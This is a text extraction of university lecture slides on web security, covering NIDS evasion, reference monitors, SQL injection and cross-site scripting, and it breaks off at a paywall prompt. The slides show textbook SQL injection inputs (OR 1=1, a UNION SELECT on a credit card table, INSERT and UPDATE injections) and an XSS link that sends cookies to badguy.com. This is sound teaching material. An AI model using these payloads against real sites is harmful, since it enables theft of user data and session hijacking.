1Web SecurityDawn [email protected] slides from John Mitechell2NIDS: Evasion & Normalization• Problems– Complete fragment reassembly necessary to detect certain attacks– NIDS only has partial knowledge of what traffic the host sees (e.g., TTL expires, MTU)– Ambiguities in TCP/IP (e.g., Overlapping IP & TCP fragments)» Different OS implement standard differently3InternetSmall TTL AttackNIDSHostEndEnd--host sees:host sees:AttackerAttacker’’s data streams data streamA T T I A C K A T T A C KANIDS sees:NIDS sees:T T I A Csame TCP same TCP seqseq#, #, ““II””has short TTLhas short TTLK4InternetFragmentation Overlap AttackEndEnd--host sees:host sees:NIDS sees:NIDS sees:AttackerAttacker’’s data streams data streamNIDSHostA T T A I C Ksame TCP same TCP seqseq##or same IP or same IP fragfragoffsetoffsetA T T A I C KA T T A I C K5Solution: Traffic NormalizerInternetNIDSHostNormalizer• Introduce “bump in the wire”: traffic normalizer to evade protocol ambiguities– Drop overlapping IP/TCP fragments– Increase TTL in packets with low TTL• Other approaches– Host-based IDS– Detailed Intranet map6Stealth Port Scanning• IP id field used for stealth port scanning7Principle: Reference Monitor• SFI, System call interposition, VMM introspection, Firewall/NIDS: one thing in common• One enforcement mechanism: reference monitor– Examines every request to access any controlled resource (an object) and determines whether to allow requestReferenceMonitorSubjectObjectRequest8Reference Monitor Security Properties• Always invoked– Complete mediation property: all security-relevant operations must be mediated by RM– RM should be invoked on every operation controlled by access control policy• Tamper-resistant– Maintain RM integrity (no code/state tampering)• Verifiable– Can verify RM correctness (correctly enforces desired access control policy)» Requires extremely simple RM» Can’t verify correctness for systems with any appreciable degree of complexity9Web Security• Web: new platform for many security-critical applications– e.g., banking, e-commerce• Web security: complex & constantly evolving• A two-sided story– Web application code» Runs at web site on web server or app server» Written in PHP, ASP, JSP, Ruby, …» Question: secure web site design– Web browser (next lecture)» Can be attacked by any website it visits» Attacks result in: computer compromise, malware installation, etc.» Question: secure web browser10Secure Web Site Design• Today’s web is dynamic• Complex web applications– Runs on web server or app server– Takes input from web users (via web server)– Interacts with databases & 3rdparties– Prepare results for users (via web server)• Examples– Shopping carts, on-line banking, bill pay, tax prep, etc.• Challenges– New code written for every web site, often with little security considerations– Many potential vulnerabilities11Common Vulnerabilities• Input validation– SQL Injection– XSS: cross-site scripting– HTTP response splitting• Cookie management– CSRF: cross-site request forgery12SQL Injection1313Dynamic Web ApplicationBrowserWebserverGET / HTTP/1.0HTTP/1.1 200 OKindex.phpDatabaseserver14Basic picture: SQL Injection14Victim ServerVictim SQL DBAttackerpost malicious formunintended queryreceive valuable data1231515What is SQL Injection?• Input Validation Vulnerability– untrusted user input in SQL query to back-end database– without sanitizing the data• Specific case of more general command injection– inserting untrusted input into a query or command• Why Bad?– supplied data can be misinterpreted as a command – could alter the intended effect of command or query16SQL Injection Example16View pizza order history:<br><form method="post" action="...">Month<select><option name="month" value="1">Jan</option>...<option name="month" value="12">Dec</option></select>Year<p><input type=submit name=submit value=View></form>Attacker can post form that is not generated by this page.1717SQL Injection ExampleSELECT pizza, toppings, quantity, order_dayFROM ordersWHERE userid=4123 AND order_month=10Normal Normal SQL SQL QueryQueryFor order_month parameter, attacker could input0 OR 1=1Malicious Malicious QueryQuery…WHERE userid=4123 AND order_month=0 OR 1=1WHERE condition is always true! Gives attacker access to other users’private data!1818SQL Injection ExampleAll User Data All User Data CompromisedCompromised19SQL Injection Example• Attacker is able to– Combine the results of two queries– Empty table from first query with the sensitive credit card info of all users from second query19For order_month parameter, attacker could input0 AND 1=0UNION SELECT cardholder, number, exp_month, exp_yearFROM creditcardsA more damaging example:2020SQL Injection ExampleCredit Card Info Credit Card Info CompromisedCompromised21More Attacks• Create new users:‘; INSERT INTO USERS (‘uname’,’passwd’, ‘salt’) VALUES (‘hacker’,’38a74f’, 3234);• Password reset:‘; UPDATE USERS SET [email protected] WHERE [email protected]’s not a joke---It’s real• CardSystems– credit card payment processing company– SQL injection attack in June 2005– put out of business• The Attack– 263,000 credit card #s stolen from database– credit card #s stored unencrypted– 43 million credit card #s exposed24Cross-Site Scripting (XSS) Attacks25Basic picture: Cross-site scripting25Attacker WebsiteVulnerable Server Website User Victimvisit web sitereceive malicious pageclick on linkecho user input123send valuable data5426The setup• User input is echoed into HTML response.• Example: search field– http://victim.com/search.php ? term = apple– search.php responds with:<HTML> <TITLE> Search Results </TITLE><BODY>Results for <?php echo $_GET[term] ?> :. . .</BODY> </HTML>• Is this exploitable?Dan Boneh27Bad input• Problem: no validation of input term • Consider link: (properly URL encoded)http://victim.com/search.php ? term =<script> window.open(“http://badguy.com?cookie = ” + document.cookie ) </script>• What if user clicks on this link?1. Browser goes to victim.com/search.php2. Victim.com returns<HTML> Results for <script> … </script>3. Browser executes script:» Sends badguy.com cookie for victim.comDan Boneh28So what?• Why would user click on such a link?– Phishing email in
View Full Document
Unlocking...